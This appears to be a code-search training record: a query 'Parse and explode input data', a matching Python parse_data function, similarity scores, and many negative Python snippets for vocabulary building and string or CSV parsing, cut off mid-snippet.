vocabulary = []\n \n for p in paragraphs:\n for word in p.split():\n vocabulary.append(word)\n\n vocabulary = set(vocabulary)\n if verbose:\n print('Built vocabulary of %d unique words'%len(vocabulary))\n \n return list(vocabulary)", "def generate_vocab():\n\n vocab_dict = {}\n folder_path = os.listdir(args.f)\n for subfolder in folder_path:\n subfolder_path = os.path.join(args.f, subfolder)\n for filename in os.listdir(subfolder_path):\n with open(os.path.join(subfolder_path, filename), 'r') as file:\n read_file = file.read()\n normalised_text = re.sub(r\"[^\\s\\w]\", \" \", read_file.lower())\n vocab = normalised_text.split() #.split() creates a list of strings\n vocab_dict.update({i: 0 for i in vocab})\n return vocab_dict", "def get_vocab(self, filename):\n return read_file(filename) #TODO(tilo): the-FAQ!", "def initialize_vocabulary(vocabulary_path):\n if gfile.Exists(vocabulary_path):\n rev_vocab = []\n with gfile.GFile(vocabulary_path, mode=\"rb\") as f:\n rev_vocab.extend(f.readlines())\n rev_vocab = [tf.compat.as_bytes(line.strip()) for line in rev_vocab]\n vocab = dict([(x, y) for (y, x) in enumerate(rev_vocab)])\n return vocab, rev_vocab\n else:\n raise ValueError(\"Vocabulary file %s not found.\", vocabulary_path)", "def build_vocab(sentences_list, vocab_size, visual_fld):\n words = [word for sentence in sentences_list for word in sentence]\n utils.safe_mkdir(visual_fld)\n with open(os.path.join(visual_fld, 'vocab.tsv'), 'w') as fd:\n dictionary = {}\n index_dictionary = {}\n count = [('UNK', -1)]\n count.extend(Counter(words).most_common(vocab_size - 1))\n for index, (word, _) in enumerate(count):\n dictionary[word] = index\n index_dictionary[index] = word\n fd.write(word + '\\n')\n\n return dictionary, index_dictionary", "def _init_vocab(self):\n self._word2idx = {}\n self._idx2word = {}\n self.freqs = {}\n self.vocab_size = 0\n\n self._add_word(self.pad_word)\n self._add_word(self.start_word)\n self._add_word(self.end_word)\n self._add_word(self.unk_word)\n\n self.start_word_idx = self.stoi(self.start_word)\n self.end_word_idx = self.stoi(self.end_word)\n self.unk_word_idx = self.stoi(self.unk_word)\n self.pad_word_idx = self.stoi(self.pad_word)\n\n self._special_tokens = {\n 'bos_token': self.start_word,\n 'cls_token': self.start_word,\n 'eos_token': self.end_word,\n 'sep_token': self.end_word,\n 'pad_token': self.pad_word,\n 'unk_token': self.unk_word,\n }\n\n self._special_ids = {\n 'bos_token_id': self.start_word_idx,\n 'cls_token_id': self.start_word_idx,\n 'eos_token_id': self.end_word_idx,\n 'sep_token_id': self.end_word_idx,\n 'pad_token_id': self.pad_word_idx,\n 'unk_token_id': self.unk_word_idx,\n }\n\n self.cls_token_id = self.bos_token_id = self.start_word_idx\n self.eos_token_id = self.sep_token_id = self.end_word_idx\n self.pad_token_id = self.pad_word_idx\n self.unk_token_id = self.unk_word_idx\n\n self.cls_token = self.bos_token = self.start_word\n self.eos_token = self.sep_token = self.end_word\n self.pad_token = self.pad_word\n self.unk_token = self.unk_word", "def get_vocab_words_from_json(self, remove_stops, min_word_freq):\n all_text = self.get_all_txt_from_json()\n vocab_with_counts = self.get_vocabulary_words_with_counts(all_text, min_word_freq)\n vocab_words = [w[0] for w in vocab_with_counts if len(w[0]) > 1] # avoid empty string and single characters\n if remove_stops:\n vocab_words = [w for w in vocab_words if w not in self.stop_words]\n return vocab_words", "def getVocabList():\n vocab_list = []\n with open('vocab.txt') as f_obj:\n while True:\n vocab_line = f_obj.readline()\n if not vocab_line:\n break\n word = re.search(r'\\t(\\w+)', vocab_line).group(1)\n vocab_list.append(word)\n return vocab_list", "def build_vocab(self, min_count=3):\n word2count = defaultdict(int)\n for sentence in self.tokenized_corpus:\n for word in sentence:\n word2count[word] += 1\n\n word2dict = {}\n word2dict['PAD'] = {'id': 0}\n word2dict['UNK'] = {'id': 1}\n for word in word2count:\n if word2count[word] >= min_count:\n word2dict[word] = {'id': len(word2dict), 'count': word2count[word]}\n self.vocab = word2dict", "def load_glove_embeddings():\n data = open(\"glove.6B.50d.txt\",'r',encoding=\"utf-8\")\n embeddings = []\n word_index_dict = {'UNK':0}\n index = 1\n for lines in data:\n wordVector = lines.split(\" \")\n if(wordVector[0] in string.punctuation or any(char.isdigit() for char in wordVector[0])):\n continue\n embeddings.append(wordVector[1:-1])\n word_index_dict[wordVector[0]] = index\n index+=1\n print(\"done\")\n\n return embeddings, word_index_dict", "def _initialize_corpus(self):\n vocab = self.vocab # vocab is the word vector\n theta = self.theta # theta is the model parameter\n corpus = self.corpus\n\n for line in corpus:\n for word in line:\n if word not in vocab:\n vocab[word] = init_vector(self.n)\n theta[word] = init_vector(self.n)\n\n if self.verbose:\n print(f\"{len(vocab)} words have been loaded\")", "def initialize_vocabulary(vocabulary_path):\n if gfile.Exists(vocabulary_path):\n rev_vocab = []\n with gfile.GFile(vocabulary_path, mode=\"rb\") as f:\n rev_vocab.extend(f.readlines())\n rev_vocab = [line.strip() for line in rev_vocab]\n vocab = dict([(x, y) for (y, x) in enumerate(rev_vocab)])\n return vocab, rev_vocab\n else:\n raise ValueError(\"Vocabulary file %s not found.\", vocabulary_path)", "def build_vocab(sentences, vocab_limit):\n # Build vocabulary\n word_counts = Counter(itertools.chain(*sentences))\n print( 'Total size of vocab is {}'.format(len(word_counts.most_common())))\n # Mapping from index to word\n # vocabulary_inv = [x[0] for x in word_counts.most_common(vocab_limit)]\n vocabulary_inv = [x[0] for x in word_counts.most_common(vocab_limit)]\n \n vocabulary_inv = list(sorted(vocabulary_inv))\n # Mapping from word to index\n vocabulary = {x: i+1 for i, x in enumerate(vocabulary_inv)}\n return [vocabulary, vocabulary_inv]", "def __init__(self, vocab_file, max_size):\n\t\tself._word_to_id = {}\n\t\tself._id_to_word = {}\n\t\tself._count = 0 # keeps track of total number of words in the Vocab\n\n\t\t# [UNK], [PAD], [START] and [STOP] get the ids 0,1,2,3.\n\t\tfor w in [UNKNOWN_TOKEN, PAD_TOKEN, START_DECODING, STOP_DECODING]:\n\t\t\tself._word_to_id[w] = self._count\n\t\t\tself._id_to_word[self._count] = w\n\t\t\tself._count += 1\n\n\t\t# Read the vocab file and add words up to max_size\n\t\twith open(vocab_file, 'r') as vocab_f:\n\t\t\tfor line in vocab_f:\n\t\t\t\tpieces = line.split()\n\t\t\t\tif len(pieces) != 2:\n\t\t\t\t\tprint ('Warning: incorrectly formatted line in vocabulary file: %s\\n' % line)\n\t\t\t\t\tcontinue\n\t\t\t\tw = pieces[0]\n\t\t\t\tif w in [SENTENCE_START, SENTENCE_END, UNKNOWN_TOKEN, PAD_TOKEN, START_DECODING, STOP_DECODING]:\n\t\t\t\t\traise Exception(\n\t\t\t\t\t\t'<s>, </s>, [UNK], [PAD], [START] and [STOP] shouldn\\'t be in the vocab file, but %s is' % w)\n\t\t\t\tif w in self._word_to_id:\n\t\t\t\t\traise Exception('Duplicated word in vocabulary file: %s' % w)\n\t\t\t\tself._word_to_id[w] = self._count\n\t\t\t\tself._id_to_word[self._count] = w\n\t\t\t\tself._count += 1\n\t\t\t\tif max_size != 0 and self._count >= max_size:\n\t\t\t\t\tprint (\"max_size of vocab was specified as %i; we now have %i words. Stopping reading.\" % (\n\t\t\t\t\tmax_size, self._count))\n\t\t\t\t\tbreak\n\n\t\tprint (\"Finished constructing vocabulary of %i total words. Last word added: %s\" % (\n\t\tself._count, self._id_to_word[self._count - 1]))", "def _make_vocab_files(self):\n self.logger.info('making question vocab...' + self.opt.QUESTION_VOCAB_SPACE)\n qdic, _ = self.load_data(self.opt.QUESTION_VOCAB_SPACE)\n question_vocab = VQADataProvider.make_question_vocab(qdic, self.max_length)\n self.logger.info('making answer vocab...' + self.opt.ANSWER_VOCAB_SPACE)\n qdic, adic = self.load_data(self.opt.ANSWER_VOCAB_SPACE)\n answer_vocab = VQADataProvider.make_answer_vocab(adic, qdic, self.opt.MAX_ANSWER_VOCAB_SIZE, self.use_ocr)\n return question_vocab, answer_vocab" ]
[ "0.7562361", "0.7207228", "0.7081693", "0.70540327", "0.7029069", "0.70169085", "0.7005524", "0.7005293", "0.7000013", "0.69506437", "0.69444656", "0.6888032", "0.6835956", "0.68238574", "0.6815228", "0.6788677", "0.6784426", "0.6746104", "0.6692373", "0.6628482", "0.660853", "0.65966874", "0.6590938", "0.65770054", "0.6518075", "0.6517311", "0.6511452", "0.65074986", "0.6500501", "0.6489932", "0.64769924", "0.6468995", "0.6449437", "0.6429598", "0.6423086", "0.6417431", "0.6411804", "0.6391895", "0.6372662", "0.6369151", "0.63594526", "0.63540536", "0.6341926", "0.63415396", "0.63345253", "0.6320891", "0.6314651", "0.6313613", "0.6311068", "0.6298519", "0.6258987", "0.6244974", "0.624036", "0.62401724", "0.623945", "0.6221216", "0.62207365", "0.6211871", "0.6206888", "0.6200254", "0.6194619", "0.6194619", "0.6194619", "0.6191754", "0.6189528", "0.61886317", "0.6186254", "0.61845064", "0.6170493", "0.61659616", "0.6157029", "0.615103", "0.61427337", "0.6141484", "0.61403054", "0.6125365", "0.61241424", "0.6122439", "0.6101403", "0.609684", "0.60963035", "0.6080102", "0.6079136", "0.6074569", "0.6074226", "0.6067544", "0.60661906", "0.6057169", "0.6055544", "0.6039234", "0.60338223", "0.60269", "0.6023609", "0.60215455", "0.60151154", "0.6010935", "0.6010185", "0.6003585", "0.6001012", "0.6000285" ]
0.7412368
1
Parse and explode input data
def parse_data(filename): labels = [] documents = [] with open(filename, 'r') as f: for line in f: values = line.split() label = values[0] document = [] for wordCount in values[1:]: parsed = wordCount.split(':') word = parsed[0] count = int(parsed[1]) document.append((word, count)) labels.append(label) documents.append(document) return (labels, documents)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def prepare_data(self, lines: List[str]) -> List[str]:\n if self.is_tokenized:\n if self.parser == \"spacy\":\n lines = [l.split() for l in lines]\n elif self.parser == \"udpipe\":\n lines = [[l.split()] for l in lines]\n\n return lines", "def parseInput(input, delimiter='|'):\n return input.split(delimiter)", "def parse(self, input):\n pass", "def __parse_string_for_delimiter__(self, data):\n parsed = []\n for row in data:\n row = self.__remove_break_line__(row)\n row = self.__split_for_delimiter__(row)\n parsed.append(row)\n return parsed", "def parse_data_inputs(data_inputs):\n match = re.search(r'\\[(.*)\\]', data_inputs)\n\n kwargs = dict((x.split('=')[0], json.loads(x.split('=')[1]))\n for x in match.group(1).split(';'))\n\n variables = [Variable.from_dict(x) for x in kwargs.get('variable', [])]\n\n domains = [Domain.from_dict(x) for x in kwargs.get('domain', [])]\n\n operation = [Process.from_dict(x) for x in kwargs.get('operation', [])]\n\n return operation, domains, variables", "def _get_data(self, input_data: str) -> None:\n\t\tdata: List[str]\n\t\t# Set data to a single-element list of [\"None\"]\n\t\tif input_data is None:\n\t\t\tself._data = [\"None\"]\n\t\t\treturn\n\t\t# Strip input data to prevent leading/trailing space interfering with type determination\n\t\traw_data: str = input_data.strip()\n\n\t\t# Get separator, or set data to a single-element list before exiting\n\t\tif \",\" in raw_data:\n\t\t\t# Set separator values\n\t\t\tself.sep_char = \",\"\n\t\t\tself.sep_str = \", \"\n\t\telif \"|\" in raw_data:\n\t\t\t# Set separator values\n\t\t\tself.sep_char = \"|\"\n\t\t\tself.sep_str = \" | \"\n\t\telif \" \" in raw_data:\n\t\t\t# Set separator values\n\t\t\tself.sep_char = \" \"\n\t\t\tself.sep_str = \" \"\n\t\telse:\n\t\t\t# If not a list, set to a single-element list, then exit.\n\t\t\tself._data = [raw_data]\n\t\t\treturn\n\n\t\t# Split, then strip whitespace\n\t\tdata = raw_data.split(self.sep_char)\n\t\tfor i in range(len(data)):\n\t\t\tdata[i] = data[i].strip()\n\n\t\t# Return\n\t\tself._data = data", "def parseFileInput(data: List[str]):\n rowsAndCols = data[0].strip().split(' ')\n rows = int(rowsAndCols[0])\n cols = int(rowsAndCols[1])\n\n res = ''\n for line in data[1:]:\n for item in line.strip().split(' '):\n res += item\n\n return res, [rows, cols]", "def _pre_process_record(self, data):\n result = []\n symbolic_split = \",\"\n if isinstance(data, dict):\n if self.measure is None:\n logging.error(\"Missing the name of keys pointing to values\")\n raise UnSADException.data_format_exception()\n if self.timestamp is not None:\n if self.timestamp in data:\n try:\n result.append(float(data[self.timestamp]))\n [result.append(data[measure])\n for measure in self.measure]\n except RuntimeError:\n logging.error(\"Invalid input data type, should be a numerical type\")\n logging.error(\"Input data should contain all the fields \"\n \"that are specified when initialize the detector: \" + str(self.measure))\n raise UnSADException.data_type_exception()\n else:\n logging.error(\"Input data should contain a timestamp field:\" + str(self.timestamp))\n raise UnSADException.data_format_exception()\n else:\n try:\n [result.append(data[measure]) for measure in self.measure]\n except RuntimeError:\n logging.error(\"Input data should contain all the fields \"\n \"that are specified when initialize the detector: \" + str(self.measure))\n raise UnSADException.data_format_exception()\n elif isinstance(data, Iterable) and not isinstance(data, str):\n if self.timestamp is not None:\n if len(data) == len(self.measure) + 1:\n try:\n result = list(data)\n result[0] = float(result[0])\n except RuntimeError as e:\n logging.error(\"Invalid input data type, timestamp should be a numerical type\")\n raise UnSADException.data_type_exception()\n else:\n logging.error(\"The number of input parameters:\" + str(\n len(data)) + \" does not match with this detectors:\" + str(len(self.measure) + 1))\n raise UnSADException.input_number_exception()\n else:\n if self.measure is None or len(data) == len(self.measure):\n result = data\n else:\n logging.error(\"The number of input parameters:\" + str(\n len(data)) + \" does not match with this detectors:\" + str(len(self.measure)))\n raise UnSADException.input_number_exception()\n else:\n if (self.measure is None or len(self.measure) == 1) and self.timestamp is None:\n if self.symbolic:\n return str(data)\n else:\n try:\n return float(data)\n except RuntimeError as e:\n logging.error(\"Invalid input data type, should be a numerical type\")\n raise UnSADException.data_type_exception()\n else:\n logging.error(\"This detector is not initialized properly\")\n raise UnSADException.not_proper_initialize_exception()\n\n if not self.symbolic:\n try:\n processed_result = [float(result[i])\n for i in range(len(result))]\n except RuntimeError as e:\n logging.error(\"Invalid input data type, should be a numerical type\")\n raise UnSADException.data_type_exception()\n\n return processed_result[0] if len(processed_result) == 1 else processed_result\n\n else:\n if self.timestamp is not None:\n return [result[0], symbolic_split.join([str(s) for s in result[1:]])]\n else:\n return symbolic_split.join([str(s) for s in result])", "def parse_dataset(self, data):\n pass", "def structure(self, ism_input):\n f = open(ism_input, 'r')\n data = []\n for line in f:\n line = line.replace('\\\"', '')\n line = line.replace('],[', '];[')\n line = line.strip()\n line = line.replace(']', '')\n line = line.replace('[', '')\n line = line.split(';')\n line[0] = line[0].split('|')\n ls = list(map(lambda x: x.split(','), line[1:]))\n ls = list(map(lambda x: list(map(lambda y: y.split('|'), x)), ls))\n line[1:] = ls\n data.append(line)\n data = np.array(data[1:]) \n \n return data", "def parse_input(question_ids, answer_ids):\r\n input_ids = list()\r\n input_ids.append(BERT_CLS)\r\n input_ids.extend(question_ids)\r\n input_ids.append(BERT_SEP)\r\n input_ids.extend(answer_ids)\r\n input_ids_truncated = input_ids[:BERT_INPUT_WORD_LEN]\r\n # print(input_ids_truncated)\r\n assert len(input_ids_truncated) <= BERT_INPUT_WORD_LEN, 'input_ids len can not exceed %d' % BERT_INPUT_WORD_LEN\r\n # print('input_ids_truncated_len ', len(input_ids_truncated))\r\n segment_ids = list()\r\n segment_question_ids = ['0'] * (len(question_ids) + 2)\r\n segment_answer_ids = ['1'] * (len(input_ids_truncated) - len(question_ids) - 2)\r\n segment_ids.extend(segment_question_ids)\r\n segment_ids.extend(segment_answer_ids)\r\n input_masks = ['1'] * len(input_ids_truncated)\r\n input_ids_parsed = RECORD_SPLIT_FLAG.join(input_ids_truncated)\r\n segment_ids_str = RECORD_SPLIT_FLAG.join(segment_ids)\r\n input_masks_str = RECORD_SPLIT_FLAG.join(input_masks)\r\n # print('segmend_ids ', segment_ids_str)\r\n # print('input_masks ', input_masks_str)\r\n return input_ids_parsed, segment_ids_str, input_masks_str", "def _build_data_from_text(self, text):\n # get CSV field\n text = text.split(self._data_sep)[self._data_col]\n # tokenize\n return super()._build_data_from_text(text)", "def parse_input(giant_string):\n X_train_part, Y_train_part, X_test_part = giant_string.split(\"XXX\")\n\n X_train_row_strings = X_train_part.split(\"S\")\n X_train_rows = [[float(x) for x in row.split(\",\")] for row in X_train_row_strings]\n X_train = np.array(X_train_rows)\n\n Y_train = concatenated_string_to_array(Y_train_part)\n\n X_test_row_strings = X_test_part.split(\"S\")\n X_test_rows = [[float(x) for x in row.split(\",\")] for row in X_test_row_strings]\n X_test = np.array(X_test_rows)\n\n return X_train, Y_train, X_test", "def parse_data(self, data):\n output=[]\n for entry in data:\n output.append(entry.replace('\\r','').replace('\\n',''))\n return output", "def make_split_data(read_data):\n split_data = re.split('[,|\\.|\\-|\\*|\\[|\\]|\\#|\\:|\\;|(\\|)|\\\"|\\'|!|\\s]+',read_data)\n\n if split_data[-1] == '':\n del split_data[-1]\n\n return split_data", "def parse_input(giant_string):\r\n X_train_part, Y_train_part, X_test_part = giant_string.split(\"XXX\")\r\n\r\n X_train_row_strings = X_train_part.split(\"S\")\r\n X_train_rows = [[float(x) for x in row.split(\",\")] for row in X_train_row_strings]\r\n X_train = np.array(X_train_rows)\r\n\r\n Y_train = concatenated_string_to_array(Y_train_part)\r\n\r\n X_test_row_strings = X_test_part.split(\"S\")\r\n X_test_rows = [[float(x) for x in row.split(\",\")] for row in X_test_row_strings]\r\n X_test = np.array(X_test_rows)\r\n\r\n return X_train, Y_train, X_test", "def process_data(line):\n wire_path_data = []\n for i in line:\n wire_path_data.append(i.strip('\\n').split(','))\n return wire_path_data", "def parse_data( self, data ):\n data = data.split( ',' )\n data = list( map( lambda x: x.strip(), data ) ) # remove white space\n # create data structure\n fields = [\n 'time',\n 'value'\n ] \n Reading = namedtuple( 'Reading', fields )\n \n try:\n return [ Reading( time = float( data[ i + 1 ] ), value = float( data[ i ] ) ) for i in range( 0, len( data ), len( fields ) ) ]\n \n except ValueError as err:\n raise err", "def _parse_import_data(self, data, import_fields, options):\n return self._parse_import_data_recursive(self.model_id.model, '', data, import_fields, options)", "def _parse_input(self):\n #temperature\n regex = re.compile(\"TEMP=(\\d+\\.\\d*|\\d+)\")\n r = regex.search(self.file_dic['input'])\n if r:\n self.temperature = r.groups()[0]\n else:\n self.temperature = 298.15\n #theory\n regex = re.compile('(\\$contrl.+\\$end|\\$basis.+ \\$end)')\n temp_theory = regex.findall(self.file_dic['input'])\n contrl = temp_theory[0][:-4][7:].strip()\n basis = temp_theory[1][:-4][6:].strip()\n self.theory = contrl + ' ' + basis", "def parse(self, data):\n raise NotImplementedError", "def parse_inputs(inputs):\n parsed = inputs.split('\\n')\n\n result_set = dict()\n this_tile = []\n tile_id = 0\n for line in parsed:\n if 'Tile' in line:\n tile_id = re.search('Tile ([0-9]+):', line).group(1)\n elif line:\n line = line.replace('#', '1').replace('.', '0')\n split_line = [int(x) for x in line]\n this_tile.append(split_line)\n else:\n result_set[tile_id] = array(this_tile)\n this_tile = []\n tile_id = 0\n\n return result_set", "def parse(self):\n\t\tfirst = None\n\t\tf = open(self.input_file)\n\t\tfor line in f.readlines():\n\t\t\tif line.startswith(\"#\"):\n\t\t\t\tcontinue\n\t\t\ttry:\n\t\t\t\tflow,t,sequence,size = line.split()\n\t\t\texcept:\n\t\t\t\tcontinue\n\t\t\t# append data to a list of tuples\n\t\t\tflow = int(flow)\n\t\t\tt = float(t)\n\t\t\tsequence = int(sequence)\n\t\t\tif size == \"x\":\n\t\t\t\tcontinue\n\t\t\tsize = int(size)\n\t\t\tif not size == 0:\n\t\t\t\tif flow == 1:\n\t\t\t\t\tself.data1.append((t,sequence,size))\n\t\t\t\telif flow == 2:\n\t\t\t\t\tself.data2.append((t,sequence,size))\n\t\t\t\telif flow == 3:\n\t\t\t\t\tself.data3.append((t, sequence, size))\n\t\t\t\telif flow == 4:\n\t\t\t\t\tself.data4.append((t, sequence, size))\n\t\t\t\telif flow == 5:\n\t\t\t\t\tself.data5.append((t, sequence, size))\n\t\t\t\telse:\n\t\t\t\t\tprint \"Erroneous data: \",flow, t, sequence, size\n\t\t\t# Keep track of the minimum and maximum time seen\n\t\t\tif not self.min_time or t < self.min_time:\n\t\t\t\tself.min_time = t\n\t\t\tif not self.max_time or t > self.max_time:\n\t\t\t\tself.max_time = t\n\n\t\t\t# print len(self.data1),len(self.data2),len(self.data3),len(self.data4),len(self.data5)", "def parse(self):\n result = list()\n for i, line in enumerate([x.strip() for x in self._input_file], 1):\n if not line:\n continue\n # There should be only 2 entries. Example:\n # kernel`0xffffffff8074d27e;kernel`_sx_xlock 1\n try:\n frames, value = line.split()\n frames = [trim_offset(n) for n in frames.split(';')]\n except ValueError:\n raise StackCollapserException('Unable to parse line {}'.format(i))\n result.append((frames, int(value)))\n return result", "def parse_xdot_data(self, data):\n\n parser = self.parser\n# if pyparsing_version >= \"1.2\":\n# parser.parseWithTabs()\n if data:\n return parser.parseString(data)\n else:\n return []", "def dataNormalize(data):\n tr = re.sub('<(.*)>|\\\\n', '', data.prettify())\n return re.sub(' +', ',', tr).split(',')", "def parse(cls, data):\n raise NotImplementedError", "def split_data(self):\n if self.seper == \"whitespace\":\n seperstring = \" \"\n elif self.seper == \"comma\":\n seperstring = \",\"\n elif self.seper == \"tab\":\n seperstring = \"\\t\"\n else:\n print self.seper + \"is not a supported delimiter. Only whitespace, comma, and tab are accepted.\"\n sys.exit()\n f = open(self.filelocation, \"rb\")\n temp = list()\n for line in f.readlines():\n temp.append(line.replace(\"\\n\", \"\").split(seperstring))\n f.close()\n data = dict()\n count = 0\n for row in temp:\n data[count] = list()\n for each in row:\n if each is not \"\":\n data[count].append(each)\n count += 1\n return data, count", "def deserialize(self, data):\n if not data:\n return\n q = collections.deque(data.split(self.sep))\n res = self.dfs2(q)\n return res", "def data_parser(data):\n\n with open(data, 'r') as inp:\n\n # take every sample\n # the last line in the text file is empty, so reading until -1\n samples = inp.read().split('\\n')[:-1]\n\n vec = []\n labels = []\n for sample in samples:\n # file is tab delimited\n split_samples = sample.split('\\t')\n # last column contains the label\n labels.append(int(split_samples[-1]))\n\n features = []\n for feature in split_samples[:-1]:\n features.append(float(feature))\n vec.append(features)\n\n # make the features and labels as a numpy array\n vec = np.array(vec)\n labels = np.array(labels)\n return vec, labels", "def parse_and_flatten(df, field_name):\n\n # Parse and flatten the list\n lst = list(df[field_name])\n lst = [x.split('|') for x in lst]\n\n lst_flat = []\n for slist in lst:\n for x in slist:\n lst_flat.append(x)\n return lst_flat", "def parse(arr_str):\n return arr_str.rstrip().replace(' ', '').split(',')[:-1]", "def parse_input(part=1):\n with open(\"input_23.txt\") as f:\n return [int(x) for x in f.readline().strip()]", "def parse_denormalized(line):\n id_, rating = line.strip().split(',')\n user, item = map(lambda x: x[1:], id_.split('_'))\n return user, item, rating", "def explode(delim, val, limit = None): \n if limit != None:\n return val.split(delim, limit)\n else:\n return val.split(delim)", "def deserialize(self, data):\n q = collections.deque(data.split(self.sep))\n \n res = self.dfs2(q)\n \n return res", "def csv_parser(s):\n\n # Data is our output. It will be a list of lists.\n\n # Split csv into lines and store them in a list called 'lines'.\n \n # Remove the first element from lines, so that you have only the data lines left.\n \n # At this stage, we loop through the list called lines.\n # As you loop\n # i. split each line on the commas;\n # ii. convert the Subject variable to int.\n # iii. convert the Height variable to float.\n # iv. add to data a list consisting of this line's Subject, Height, and Occupation values ", "def parse_data(fp):\n pass", "def extract_data(line):\n tmp = line.split('=',1)[1]\n tmp = tmp.split('data = ')[1:]\n tmp = [x.split('}') for x in tmp]\n tmp = [x[0] for x in tmp]\n tmp = [x.lstrip('{') for x in tmp]\n return tmp", "def parse_data(self):\n\t\traise NotImplementedError('%s: No parse function implemented!' % self.name)", "def parse(data):\n parser=Parser(data, True)\n return parser.parse()", "def format_data(data_string):\n lines = data_string.split('\\\"\\n\\\"')\n split_data = [re.split(r\"\\\"\\s*,\\s*\\\"\", line) for line in lines]\n\n return split_data", "def split(self, X):", "def get_input():\n # return TEST_INPUT.strip().split('\\n\\n')\n with open(INPUT_FILE) as f:\n return f.read().strip().split('\\n\\n')", "def parse_input(data: Iterator[str]) -> Iterator[SnailfishNumber]:\n yield from (SnailfishNumber.from_str(line.strip())\n for line in data)", "def parse_input():\r\n endpoints_file = open(\"input.txt\", \"r\")\r\n lines = endpoints_file.readlines()\r\n line_number = 0\r\n endpoints = []\r\n for line in lines:\r\n line = line.strip()\r\n if line_number == 0:\r\n period = int(line)\r\n elif line_number == 1:\r\n max_attempts = int(line)\r\n else:\r\n endpoints.append(line)\r\n line_number += 1\r\n endpoints_file.close()\r\n return endpoints, period, max_attempts", "def csv_parser(s):\r\n data = []\r\n lines = s.splitlines()\r\n lines = lines[1: ]\r\n for line in lines:\r\n l = line.strip().split(\",\")\r\n l[0] = int(l[0])\r\n l[1] = float(l[1])\r\n data.append(l)\r\n return data\r\n\r\n #data.pop[i]\r\n #file2 = s.split()\r\n #lines = []\r\n #lines.append(file2)\r\n #lines.pop[0]\r\n #print(lines)\r\n #for line in lines:\r\n \r\n\r\n # Data is our output. It will be a list of lists.\r\n\r\n # Split csv into lines and store them in a list called 'lines'.\r\n \r\n # Remove the first element from lines, so that you have only the data lines left.\r\n \r\n # At this stage, we loop through the list called lines.\r\n # As you loop\r\n # i. split each line on the commas;\r\n # ii. convert the Subject variable to int.\r\n # iii. convert the Height variable to float.\r\n # iv. add to data a list consisting of this line's Subject, Height, and Occupation values \r", "def preprocess_split(self, input_dataset, last_id, num_sents, max_sent_len, prefix_id = \"\"):\n dataset = []\n for sent in input_dataset[last_id:]:\n last_id += 1\n if type(sent) == tuple or len(sent) > max_sent_len or len(sent) <= 1:\n continue\n dataset.append(self.preprocess_sent(sent, prefix_id + str(len(dataset))))\n if len(dataset) == num_sents:\n break\n\n return dataset, last_id", "def parser(sent_list): #input: list of sentences", "def base_parsing(lines):\n lines = [l.strip() for l in lines]\n return [ tuple(line.split(sep='-')) for line in lines ]", "def _parseLine(self, line, delimiter = \":\"):\r\n\t\tsplt = line.split(delimiter)\r\n\t\tinVec = self._parseVec(splt[0])\r\n\t\toutVec = self._parseVec(splt[1])\r\n\t\tif (len(splt) == 2):\r\n\t\t\tlabel = \"\"\r\n\t\telse:\r\n\t\t\tlabel = splt[2]\r\n\t\tself.data.append({'in':inVec, 'out':outVec, 'label':label})", "def parse_normalized(line):\n return line.strip().split(',')", "def split_into_tokens(dataset, delimiter=\"\"):\n pass", "def parse(text):\n # Make sure that there's text to be split\n if text == None:\n return text\n return text.split(',')", "def read_input():\n splits = []\n with open('solutions/day5/input.txt') as f:\n for line in f:\n splits.append(line.strip('\\n'))\n return splits", "def process_data(data: str) -> list[Instruction]:\n instructions = []\n for line in data.strip().split(\"\\n\"):\n instruction = process_line(line)\n instructions.append(instruction)\n return instructions", "def parse_string(self, data):\n pass", "def split_data(lines_in):\n rows = []\n for line in lines_in:\n field = []\n\n for i in line.split(\"\\t\"):\n field.append(i)\n rows.append(field)\n\n rows = rows[1:] # strip header\n\n return rows", "def _data_normalization(data: list) -> list:\n\n return [ \n [\n d[0], # IP\n d[1], # Port\n Froxy._split_proxy_info(\n d[2].strip(' ') # Proxy Info\n ) \n ]\n for d in data\n ]", "def string_split_2d(data, field_delimiter=',', line_delimiter='\\n'):\n return [line.split(field_delimiter) for line in data.split(line_delimiter)]", "def parse_input(self, some_input):\n\n temp = []\n temp2 = []\n\n # breaks apart input\n for el in some_input:\n temp.append(el)\n\n if len(some_input) == 3:\n temp[1] = str(temp[1] + str(temp[2]))\n temp.pop()\n\n temp[1] = int(temp[1])\n\n # Checks boundries and input type before conversion\n dataValidation = [self.validate_move_input_and_bounderies(temp)]\n if False in dataValidation:\n print(\"Try Again\")\n return False\n\n temp2.append(self._row_conversion[temp[1]])\n temp2.append(self._col_conversion[temp[0]])\n\n return temp2", "def parse(day):\n data = Input(day).read().split('\\n')\n return [el for el in data if el != '']", "def parseInput(toParse):\n splitified = toParse.split('--------')\n statesPath = splitified[0].rstrip().strip()\n availableStates = len(splitified[1].rstrip().strip().split())\n probMatrix = splitified[2].rstrip().strip().splitlines()\n\n return(probMatrix, statesPath, availableStates)", "def parse_data(self, data):\n pids = set()\n cams = set()\n \n for info in data:\n pids.add(info[1])\n cams.add(info[2])\n return len(pids), len(cams)", "def parse_data(self, fileinput):\n with open(fileinput, 'rb') as fh:\n for line in fh:\n try:\n name, address, phone = line.strip().split(\",\")\n self.data.append(Document(name, address, phone))\n except Exception, ex:\n raise SerialException(\": Failed to parse input line %s: %s\" % (line, ex))\n return", "def _parser(data=\"\"):\r\n\r\n if data == \"\":\r\n pass\r\n \r\n \"\"\"Retrieve timestamp\"\"\"\r\n validate(data[:25])\r\n \"\"\"retrieve log data\"\"\"\r\n log_data = re.findall(r\"[\\w]+\", data)\r\n \"\"\"Retrieve user info\"\"\"\r\n login_info = [log_data[i] for i in (7, 9, 11, 13, 15)]\r\n\r\n \r\n return login_info, log_data", "def _parse(self, array):\n return [self._parse_note(x) for x in array]", "def prepare_data(self, data):\n # Break string into a list of sentances\n in_sentances = tokenize.sent_tokenize(data)\n out_sentances = list()\n for sentance in in_sentances:\n # Turn each word in sentance into its lemma\n lemmas = [self.lemmatizer.lemmatize(word) for word in sentance.split(\" \")]\n # Filters out all words that fail the is_valid_lemma function\n lemmas = [lemma for lemma in lemmas if self.is_valid_lemma(lemma)]\n # Joins words back together and add to list\n sentance = ' '.join(lemmas)\n out_sentances.append(sentance)\n return out_sentances", "def parse(\n data: str,\n raw: bool = False,\n quiet: bool = False\n) -> Dict:\n jc.utils.compatibility(__name__, info.compatible, quiet)\n jc.utils.input_type_check(data)\n\n raw_output: Dict = {}\n split_me = {'it_value:', 'it_interval:'}\n\n if jc.utils.has_data(data):\n\n for line in filter(None, data.splitlines()):\n\n # epoll files\n if line.startswith('tfd:'):\n line_match = 